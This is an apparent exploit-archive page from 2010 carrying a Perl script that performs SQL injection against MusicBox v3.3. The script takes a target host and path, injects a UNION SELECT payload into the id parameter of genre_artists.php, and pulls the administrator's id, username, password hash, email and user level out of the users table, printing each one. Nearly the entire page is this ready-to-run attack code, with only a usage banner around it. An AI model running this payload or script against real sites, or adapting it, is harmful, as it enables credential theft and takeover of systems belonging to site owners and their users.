Home / os / win7

MusicBox v 3.3 SQL Injection Exploit

Posted on 20 April 2010

==================================== MusicBox v 3.3 SQL Injection Exploit ==================================== #!/usr/bin/perl use LWP::Simple; print " "; print "############################################################## "; print "# MusicBox v 3.3 SQL INJECTION EXPLOIT # "; print "# Author: Ctacok (Russian) # "; print "# Special for Antichat (forum.antichat.ru) and xakep.ru # "; print "############################################################## "; print " Usage: exploit.pl [host] [path] "; print " EX : exploit.pl www.localhost.com /path/ "; print " userlevel 9 = SuperAdmin "; print " pass = md5($pass)"; if (@ARGV < 2) { exit; } $host=$ARGV[0]; $path=$ARGV[1]; $vuln = "-1+union+select+1,2,concat(0x3a3a3a,userid,0x3a,username,0x3a,password,0x3a,email,0x3a,userlevel,0x3a3a3a),4,5,6,7+from+users+"; $doc = get($host.$path."genre_artists.php?id=".$vuln."--+&by=ASC"); if ($doc =~ /:::(.+):(.+):(.+):(.+):(.+):::/){ print " [+] Admin id: : $1"; print " [+] Admin username: $2"; print " [+] Admin password: $3"; print " [+] Admin email: $4"; print " [+] Admin userlevel: $5"; }else{ print " My name is Fail, Epic Fail... " } # Inj3ct0r.com [2010-04-20]

 

TOP